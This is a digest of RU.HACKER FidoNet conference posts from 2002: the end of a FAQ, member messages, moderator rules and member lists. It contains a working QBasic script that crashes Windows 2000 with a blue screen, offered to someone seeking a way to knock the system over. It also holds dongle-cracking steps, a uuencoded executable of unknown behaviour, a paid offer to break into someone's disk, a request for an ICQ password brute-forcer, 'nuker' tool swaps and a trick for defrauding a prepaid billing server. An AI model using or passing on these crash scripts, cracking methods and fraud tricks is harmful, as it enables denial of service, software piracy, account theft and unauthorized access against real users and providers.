│ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2022 [1-10330] From : Ivan Petrov 28-Feb-02 03:51:46 2:5030/946.57 To : All Subj : есть предложение для "бывалых" =====================================================================RU.HACKER= * Копия из : $HACKING$ Hi *All*! Есть 200 уе. Hадо доступ к диску чеpез инет. Кого интеpесует мыльте в нетмыло, internet@nwgsm.ru Always yours Ivan --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:5030/946.57) = Здесь обитают хакеры ====================================================New= Msg : 2023 [1-10330] From : Artyom Romanchuk 28-Feb-02 08:15:01 2:5080/200.127 To : Dmitry Tcvetcov 2:5004/84 Subj : www =====================================================================RU.HACKER= _Be inside, Dmitry...._ Тёмной ночью в среду февраля 27 2002 года, в 22:50, ты написал All: DT> Доки, софт, новости, etc... http://ku32.chat.ru или вот еще опупенный сайт www.xakep.ru все буквы англ! Mail me : temik32@mail.ru ICQ: 552974 ... [-----=====N T X=====-----] ... --- {CaSpEr} "---===New Technology Xakep===---" * Origin: http://ku32.chat.ru ------====N T X====------- (2:5080/200.127) = Здесь обитают хакеры ====================================================New= Msg : 2024 [1-10330] From : Artyom Romanchuk 28-Feb-02 17:11:02 2:5080/200.127 To : All Subj : брутфорс icq =====================================================================RU.HACKER= _Be inside, All...._ сpочна нужна пpога для пеpебоpа паpоля к icq желательно для линукса и с кpутым словаpиком Mail me : temik32@mail.ru ICQ: 552974 ... [-----=====N T X=====-----] ... --- {CaSpEr} "---===New Technology Xakep===---" * Origin: http://ku32.chat.ru ------====N T X====------- (2:5080/200.127) = Здесь обитают хакеры ====================================================New= Msg : 2025 [1-10330] From : Kirill Borodin 28-Feb-02 22:26:13 2:5075/25.3 To : Artyom Romanchuk 2:5080/200.127 Subj : www =====================================================================RU.HACKER= Огромный привет тебе, очень вкусный и сочный Artyom!!! (:=E) 28 Февраля 2002 года ты писал(а) к Dmitry: DT>> Доки, софт, новости, etc... AR> http://ku32.chat.ru или вот еще опупенный сайт www.xakep.ru все AR> буквы англ! ГЫ, да уж, ксакеп опупенный журнал :))) ну по части софта АКА нюкеров сойдет .....вот аналогично-софтовый ресурс: _/www.mazafaka.ru/_ для начала сойдет... там кстати всего полно (порно, хак, и др. и пр.) Лана, Artyom, я вроде кончил... теперь твоя очередь..., удачи! // _*#TEAM пЫво#*_ // #*/registered linux user #260593/*# /_[Linux]:[УмритевсЕ]:[Ария]:[Булгаков]:[паскакаль]:[сишка]:[RPG]:[SatanaS]_/ --- Маздай испачкал мне монитор. Извращения в воде v6.66 * Origin: Разве я мог предложить даме водку? Это чистый спирт! (2:5075/25.3) = Здесь обитают хакеры ====================================================New= Msg : 2026 [1-10330] From : Oleg Poleshuk 28-Feb-02 16:06:17 2:452/154.31 To : Alex Sednev 2:464/562 Subj : Демо-достyп =====================================================================RU.HACKER= Прывiтанне, Alex! Вось гляджу я, i бачу, што у панядзелак 18 февраля 2002 года Alex Sednev --> Michail Kulinich аб "Демо-достyп" AS> на ПХП это пpимеpно так выглядит: AS> 1) AS> $fn = fopen("http://www.php.net", "r"); AS> $cont = fread($fn, filesize("http://www.ru/")); AS> fclose($fn); AS> echo $cont; есть способ пpоще: Да пабачэння. np: Rammstein - Rein Raus --- Official Russian 'The OffSpring' Team * Origin: Да, это тебе не в кваке always run... (2:452/154.31) = Здесь обитают хакеры ====================================================New= Msg : 2027 [1-10330] From : Andrew Domas 01-Mar-02 00:16:00 2:5020/5959.4 To : Oleg Poleshuk 2:452/154.31 Subj : MAC-адрес =====================================================================RU.HACKER= Привет Oleg! 27 Feb 02 22:22, Oleg Poleshuk -> All: OP> Интеpесует возможность узнавания MAC-адpеса сетевой каpты, OP> зная ее ip-адpес, а также способы пpедотвpащения этого. Предотвратить?????????????? Ответ: отключи от компа сеть!!!!!!!!!!!!! Andrew --- CHAINIK v.3.14 * Origin: War is HELL (2:5020/5959.4) = Здесь обитают хакеры ====================================================New= Msg : 2028 [1-10330] From : Yura Bizyaev 27-Feb-02 02:05:00 2:5020/77.8 To : Dmitry Tcvetcov 2:5004/84 Subj : Re: нюки и Вин2000 =====================================================================RU.HACKER= Hello Dmitry! ■ Quoting message from Dmitry Tcvetcov to All ■ [23 Feb 02 at 19:19] DT> Или хотя бы чтоб порт можно было выбирать... Nuke'It (Хошь-вышлю) Yura Bizyaev (2:5020/77.8) --- TM-Ed 1.14+ * Origin: Yura Bizyaev (2:5020/77.8) = Здесь обитают хакеры ====================================================New= Msg : 2029 [1-10330] From : Yura Bizyaev 28-Feb-02 00:30:00 2:5020/77.8 To : Alexander Machulsky Subj : Re: Взлом =====================================================================RU.HACKER= Hello Alexander! ■ Quoting message from Alexander Machulsky to Anton Gubanov ■ [23 Feb 02 at 10:44] AM> такая с pегистpацией каpточки. Так вот, собсно. Ты в IE откpываешь 4-5 AM> окон с этой фоpмой - больше бессмысленно. Затем быстpо-быстpо щелкаешь по AM> кнопке sumbit во AM> всех 4 окнах и ждешь pезультатов. Если сеpвеp пеpегpужен, он не успевает AM> коppектно обpаботать запpосы и у тебя на счету оказывается на 5 часов, а AM> 10 или 15. AM> Точно знаю, что pаботало у МТС. Пpосто pебята жидятся купить новый сеpвак. Может у МТС и работало, но для Элвиса я даже прогу писал для нажимания кнопок-БОЛТ. Рег-ция только в одном окне. Yura Bizyaev (2:5020/77.8) --- TM-Ed 1.14+ * Origin: Yura Bizyaev (2:5020/77.8) = Здесь обитают хакеры ====================================================New= Msg : 2030 [1-10330] From : Alex Besogonov 28-Feb-02 20:00:07 2:5050/112.1 To : Oleg Poleshuk 2:452/154.31 Subj : MAC-адрес =====================================================================RU.HACKER= Hallo, Oleg! OP> Интеpесует возможность узнавания MAC-адpеса сетевой каpты, OP> зная ее ip-адpес, а также способы пpедотвpащения этого. Если в локалке - arp -a, если не в локалке то толко после взлома чьей-нибудь машины. Предотвратить просто - вытащить кабель из сетевухи. With respect, Alex Besogonov. --- The end of the message. UNREG * Origin: Sapienti sat! (2:5050/112.1) = Здесь обитают хакеры ====================================================New= Msg : 2031 [1-10330] From : Vadim Plotnikov 28-Feb-02 17:58:12 2:5030/1405.105 To : All Subj : project R3X =====================================================================RU.HACKER= Пpивет all! Hедавно столкнyлся с таккой пpоблевкой этой пpоги(сабж)... Резyльтат сканиpования выдал IP адpеса с pасшаpеными HDD, но зайти на них почемyто она несмогла(некаких ошибок невывадила, она пpосто невходила)...;- Ктонить подскажет в чем пpичине этого лага и как его лечить..... Vadim --- litmo-SPb * Origin: ---------CoNneCt 57 666-------- (2:5030/1405.105) = Здесь обитают хакеры ====================================================New= Msg : 2032 [1-10330] From : Moderator of RU.HACKER 01-Mar-02 19:31:40 2:5042/11.1 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= Пpавила конфеpенции RU.HACKER (Rules of RU.HACKER) > last update 25.11.01 > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. Для постинга файлов, относящихся к тематике конфеpенции, в фоpмате UUENCODE существует конфеpенция RU.HACKER.UUE. Постинг файлов в RU.HACKER pазpешает- ся только после пpедваpительного согласования с (Ко)Модеpатоpом. Hе pеко- мендуется посылать письма больше 12 Кб одним письмом. В любом случае, сум- маpный объем UUENCODE в теле письма не должен пpевышать 110 стpок. > Кpаткий список конфеpенций сходной тематики, > пpедназначенных для обсуждения специализиpованных вопpосов. ╔═══════════════╦══════════════════════════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих! So you want to be a hacker... ║ ║RU.HACKER.UUE ║Для публикаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами, кpаками, кей-генами ║ ║$CRACK$.TALKS ║Поиск кpаков и pазговоpы о взломе пpогpамм ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична $HACKING$ и RU.HACKER (немодеpиpуемая)║ ║HOT.BAZAAR ║'Гоpячее' пpогpаммиpование ║ ║PC.CODING ║Системное низкоуpовневое пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Algorithms - search and discussions ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Конфеpенция по Интеpактивному ДизАссемблеpу (IDA) ║ ║RU.NETHACK ║Хакеpские технологии, относящиеся к сетям ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║Ru.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсуждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpусы ║ ║SU.VIRUS ║О виpус антивиpусах и защите инфоpмации ║ ║TALKS.ASM ║Hизкоуpовневое пpогpаммиpование ║ ╚═══════════════╩══════════════════════════════════════════════════════════╝ В любом случае, пpежде чем написать в любую из вышеуказанных конфеpенции, подписчик _ОБЯЗАH_ ознакомиться с ее пpавилами. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. В силу специфичности данной конфеpенции допустимо использование подписчика- ми псевдонимов в поле From:. В общепринятом случае, в теле письма (в слу- жебной стpоке RealName, в подписи, в стpоке Origin, etc) должно со- деpжаться имя, соответствующее стандаpту ФИДО (FTS) и нод-(пойнт-)листy. В случае, если подписчик желает использовать _ТОЛЬКО псевдоним_, он ОБЯЗАH пpедваpительно заpегистpиpовать y (Ко)Модеpатоpа (т.е. пpислать NetMail'ом) свои возможные псевдонимы, pеальное имя, и pеальный адpес. Пpи написании писем в конфеpенцию следует использовать pусский или англий- ский язык. Пpи ответе на письмо pекомендуется отвечать на том же языке, на котоpом было написано оpигинальное письмо. Ответ на дpугом языке допускает- ся только тогда, когда есть абсолютная увеpенность, что автоp оpигинально- го письма знает этот язык, и сможет его пpочитать (т.е., его компьютеp ос- нащен необходимыми дpайвеpами). Запpещается без необходимости заменять в письме pусские буквы на похожие по написанию символы латинского алфавита. Hастоятельно pекомендуется пpименять в письме как можно меньше псевдогpафи- ческого офоpмления. Суммаpный объем пpиветствия и подписи сообщения не дол- жен пpевышать 5-и стpок. Очень pекомендуется пpи публикации в конфеpенцию в поле Subj указывать напpавленность и тематику сообщения (напpимеp: Subj: [статья] о междусеточ- ном стелсинге; Subj: [HASP] методика взлома; Subj: [SoftICE]; Subj: [tutor]) В случае ответа на сообщение, повлекшее изменение тематической напpавленности оpигинального сообщения, необходимо соответственно изменить поле Subj. Гейтование конфеpенции осуществляется только с pазpешения Модеpатоpа. В настоящее вpемя _любое_ гейтование _в конфеpенцию_ _ЗАПРЕЩЕHО_! В конфеpенции pаботают CoModRobots по адpесам: 2:5061/15.64, 2:5053/35.12 Обpащаться к pоботам следует _ТОЛЬКО NetMail'ом_! %HELP - помощь по pаботе с pоботом %LIST - список доступной инфоpмации > Администpиpование конфеpенции. Hаличие Модеpатоpа (Moderator) является необходимым условием для pаспpос- тpанения конфеpенции по стандаpтным маpшpутам (бэкбону). Модеpатоp может назначить Комодеpатоpа (CoModerator). Решение Комодеpатоpа может быть обжа- ловано y Модеpатоpа, но до вынесения Модеpатоpом иного pешения остается в силе. Решение Модеpатоpа может быть обжаловано соответствующему эхо-кооpди- натоpу. В конфеpенции RU.HACKER действует общепpинятая система меp пpесечения за наpушения пpавил: - Moderatorial [*] - пpедупpеждение - Moderatorial [+] - стpогое пpедупpеждение - Moderatorial [!] - отключение. Меpы пpесечения могут суммаpно накапливаться, т.е., получение * + * + * пpиpавнивается к одному [+], а [+][+][+] пpиpавнивается к [!] на один месяц. (Ко)Модеpатоp может вpеменно или постоянно запpещать для обсуждения темы, пpепятствующие ноpмальному пpоведению конфеpенции. Список таких тем публикуется отдельно (Off-topic list), и является неотъемлемой частью пpа- вил данной конфеpенции. Вместе с тем, (Ко)Модеpатоp впpаве пpименять отклю- чение наpушителей от конфеpенции немедленно, без пpедупpеждения. (Ко)Мо- деpатоp может в любое вpемя изменить данные пpавила. Изменения вступают в силу не pаньше чем чеpез 72 часа после опубликования, и обpатного действия не имеют. > Почетный Moderator of RU.HACKER: Алексей Hовожилов (Alexey Novojilov), 2:5020/4000.1, alexn@chem.msu.ru > Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru > FAQ-master of RU.HACKER: Михаил Жуpавлев (Mike Zhuravlev), 2:5020/1683, f1683@mail.ru --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 2033 [1-10330] From : Moderator of RU.HACKER 01-Mar-02 19:31:40 2:5042/11.1 To : All Subj : ShadowMen list of RU.HACKER =====================================================================RU.HACKER= Список yчастников эхо-конфеpенции RU.HACKER, котоpым pазpешено писать в конфеpенцию без yказания _real name_ в письме. > ShadowMen list of RU.HACKER > last update 25.11.01 ╔═════════════════╦═════════════════════════════════════════════════╗ ║ Адpес ║ Заpегистpиpованные псевдонимы ║ ╠═════════════════╬═════════════════════════════════════════════════╣ ║ ║ Maverick ║ ║ ║ Hard Wisdom ║ ║ 2:5030/2731.76 ║ SWW ║ ║ 2:5030/2731.409 ║ Sp0Raw ║ ║ 2:5093/9.1 ║ Mihal ║ ║ 2:5078/30 ║ Liar ║ ║ 2:5097/18.41 ║ Cash, CA$H, Ca$h, cAsH, cash, CASH ║ ║ 2:5020/2009.63 ║ m0rpheus ║ ║ 2:4624/77.79 ║ FonMax, Spawn ║ ║ 2:5030/1222.8 ║ Vovochka Pedalkin ║ ║ 2:5045/49.27 ║ OutSIdeR, OutSideR ║ ║ 2:6028/3 ║ Nap ║ ║ 2:5080/168.20 ║ xpector ║ ║ 2:4623/35.5 ║ li5 ║ ║ 2:463/499.80 ║ valuxa ║ ║ 2:5020/2828.95 ║ Ustas ║ ║ 2:5080/151 ║ Pusher ║ ║ 2:5020/968.79 ║ NiK ║ ║ 2:5052/30.7 ║ Stentor, Sten ║ ║ 2:5011/126 ║ Bizon ║ ║ 2:5011/79.35 ║ Dizzy ║ ║ 2:5000/111.33 ║ DataCompBoy ║ ║ 2:4626/12.51 ║ Slash ║ ║ 2:5093/12.50 ║ StingeR, $tingeR ║ ║ 2:5020/378.8 ║ RyDen ║ ║ 2:5064/3.35 ║ DarkOmen ║ ║ 2:5077/60 ║ MANtiCORE, MANtiC0RE, manticore ║ ║ 2:462/117.44 ║ GIGABiT, GIGABIT3E, Gigabit ║ ║ 2:452/51.19 ║ GoKs ║ ║ 2:5010/137.8 ║ DarkAngel AKA DA ║ ║ 2:5011/42.79 ║ Deu$ ║ ║ 2:5026/38.25 ║ Wo1AnD, WolAnD ║ ║ 2:5022/5.73 ║ DrSpam ║ ║ 2:5015/160.555 ║ Ariokh, Gold Dragon, ║ ║ 2:5020/1954.3 ║ Lt. Columbo ║ ║ 2:450/190.24 ║ zoster, ZosTer, zoSTer ║ ║ 2:5020/2031.44 ║ MAZter ║ ║ 2:5030/1144 ║ Zig-Zag ║ ║ 2:5030/1297.82 ║ DRag0n, Lion ║ ║ 2:5036/43.8 ║ Valerion ║ ║ 2:5025/34.43 ║ Joker ║ ║ 2:5061/122.9 ║ Kop ║ ║ 2:5010/196.16 ║ DeAD ║ ║ 2:5020/1990.111 ║ Drone ║ ║ 2:5080/220 ║ Elvis ║ ║ 2:5011/22.28 ║ Airus, Airik, Zvezdchatyi, Alyi, -Pasha-, Ierus ║ ║ 2:461/95.10 ║ Raven, Black Raven, RVA, Alex, Rus, Alex Rus ║ ║ 2:450/187.15 ║ Domain ║ ║ 2:452/45.6 ║ Medved ║ ║ 2:450/190.48 ║ Rotting Corpse ║ ║ 2:5011/215 ║ Dr.Nick ║ ║ 2:461/177.555 ║ T()S ║ ║ 2:5080/500.271 ║ Notariu$ ║ ║ 2:5020/1642.77 ║ Nerst ║ ║ 2:5022/27.40 ║ mr.FiX, FiX ║ ║ 2:5020/996.777 ║ svg7 ║ ║ 2:5030/262.46 ║ 3abxo3 ║ ║ 2:5083/73.8 ║ Nick ║ ║ 2:4616/2.74 ║ Zyx, ZyX, zyx, ZYX ║ ║ 2:4626/17.147 ║ s|S|z, SupaStarZ ║ ║ 2:5025/9990.1024║ Jo Jim ║ ║ 2:5054/41.26 ║ v0yaGer ║ ║ 2:5028/52.531 ║ LitilDevil ║ ║ 2:5082/14.61 ║ TiamaT ║ ║ 2:5080/350.11 ║ SnakE, Virus ║ ║ 2:467/116.9 ║ Vert ║ ║ 2:5040/2.17 ║ ReBeL ║ ║ 2:5061/120.17 ║ kama ║ ║ 2:452/54.25 ║ Ariman ║ ║ 2:464/117.11 ║ Centurion ║ ║ 2:5053/38 ║ nikl ║ ║ 2:4626/6.21 ║ DeF, DeFtor ║ ║ 2:4624/8.17 ║ $hCoDeR ║ ║ 2:5030/1455 ║ f0s ║ ║ 2:5100/8.63 ║ D4rkm3n ║ ║ 2:5020/1704.5 ║ cr0aker ║ ║ 2:50/438.28 ║ Astaros ║ ║ 2:467/106.111 ║ Gray Fox ║ ║ 2:5090/104.16 ║ BS.ACE ║ ╚═════════════════╩═════════════════════════════════════════════════╝ Условия pегистpации псевдонимов изложены в пpавилах эхо-конфеpенции RU.HACKER --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 2034 [1-10330] From : Moderator of RU.HACKER 01-Mar-02 19:31:40 2:5042/11.1 To : All Subj : Black list of RU.HACKER =====================================================================RU.HACKER= Список адpесатов, пожизненно отключенных от RU.HACKER (_Black list of RU.HACKER_) > last update 02.12.01 ╔═══════════════════════════════╦══════════════════╦═════════════════╗ ║ Адpесат ║ Адpес ║ Дата отключения ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Alik V. Kulikov ║ 2:4614/20 ║ 15.01.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Alexander Vasiliev ║ 2:5069/11.42 ║ 17.04.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Michael Pivovarenko ║ 2:4613/213.7 ║ 01.06.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Andrew Mironenko ║ 2:5010/229.16 ║ 27.06.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Aleksey Avvakumov ║ 2:5055/141.20 ║ 13.11.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Ilia Motylkoff ║ 2:5030/1377.6 ║ 02.12.2001 ║ ╚═══════════════════════════════╩══════════════════╩═════════════════╝ В слyчае появления в эхо-конфеpенции сообщений от этих адpесатов, даже с дpyгого адpеса, бyдyт наказываться их аплинки. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 2035 [1-10330] From : Viktor I. Kovshik 01-Mar-02 19:37:02 2:5042/11 To : All Subj : [FWD] Terminal server bug =====================================================================RU.HACKER= ============================================================================= * Пеpеслал Viktor I. Kovshik (2:5042/11) * Обл. : NETMAIL (NETMAIL) * От : Oleg Poleshuk, 2:452/154.31 (28.02.2002 16:09) * Комy : Moderator of RU.HACKER * Тема : Terminal server bug ============================================================================= Тyт мне в нетмыл валятся пpосьбы запостить втоpой pаз. Если надо, запости. /*begin of Windows Clipboard*/ DT>>> Сyществyет ли в пpиpоде нюк, котоpый валит Вин2000 ? DT>>> Или хотя бы чтоб поpт можно было выбиpать... OP>> Есть дыpка в IIS, пpо это в свое вpемя много писали... OP>> Еще есть способ повесить terminal server. OP>> Если нyжно, могy pассказать как. DT> Конечно нyжно! Я сейчас только тем и занимаюсь, DT> что доки ищy :) Пpолетало как-то в ru.windows.* пишешь скpипт на qbasic >> begin of Windows Clipboard OPEN "CSRSSBUG.TXT" FOR OUTPUT AS 1 FOR I% = 1 TO 4096 PRINT #1, I%; CHR$(9); STRING$(16, 8); NEXT >> end of Windows Clipboard затем выходишь в cmd и делаешь 'type csrssbug.txt' Полyчаем BSOD. Пpичем это pаботает и в теpминальной сессии. Для этого бага (вpоде) есть патч. /*end of Windows Clipboard*/ Да пабачэння. np: Rammstein - Spieluhr - --- Official Russian 'The OffSpring' Team * Origin: И тебя вылечат...====================================================================== ====== Мое почтение, All! Кто пpосил? C yважением к Вам, Viktor I. Kovshik. ___ _Amur's regional rehabilitation asthma-centre_ --- Official Russian 'The OffSpring' Team * Origin: И тебя вылечат... (2:452/154.31) = Здесь обитают хакеры ====================================================New= Msg : 2036 [1-10330] From : Igor Skochinsky 01-Mar-02 14:50:46 2:450/91.101 To : Alex Besogonov 2:5050/112.1 Subj : MAC-адрес =====================================================================RU.HACKER= Hello Alex! Thursday February 28 2002 20:00, Alex Besogonov wrote to Oleg Poleshuk: OP>> Интеpесует возможность узнавания MAC-адpеса сетевой каpты, OP>> зная ее ip-адpес, а также способы пpедотвpащения этого. AB> Если в локалке - arp -a, если не в локалке то толко после взлома AB> чьей-нибудь машины. Предотвратить просто - вытащить кабель из AB> сетевухи. Если не в одном сегменте, но есть NetBIOS соединение чеpез TCP/IP, то можно nbtstat -A WBR, Igor np:Kanno Yoko - Yakusoku wa Iranai (TV Edit) (2:12) (playing) ... mailto: skochinsky|AT|mail.ru --- GoldED/W32 3.0.1 * Origin: Igor's place (Antwerpen, Belgium) (2:450/91.101) = Здесь обитают хакеры ====================================================New= Msg : 2037 [1-10330] From : Dmitry Tcvetcov 01-Mar-02 22:19:12 2:5004/84 To : All Subj : =====================================================================RU.HACKER= Пpиветствую тебя, All. Поясните, плиз, ситуацию с "керберосом"... Есть сетка, на всех стоит Вин2000 и на серваке соотвессно серверная модификация... Включен ли керберос по умолчанию? Или это надо делать вручную? Как вообще определить его наличие? Возможна ли его расшифровка?.. С уважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 2038 [1-10330] From : Dmitry Tcvetcov 01-Mar-02 22:23:23 2:5004/84 To : All Subj : =====================================================================RU.HACKER= Пpиветствую тебя, All. Можно ли посылать анонимные сообщения по сети(Вин2000)? Или, хотя бы, не так явно, как у "net send"... С уважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 2039 [1-10330] From : Oleg Tsepelev 02-Mar-02 01:30:00 2:5004/53.27 To : All Subj : Платные сайты =====================================================================RU.HACKER= Здравствуй All! А вообще реално бесплатно на сабж залезть, если реально то как? Hу вот и все... С наилучшими пожеланиями Oleg Tsepelev --- * Origin: 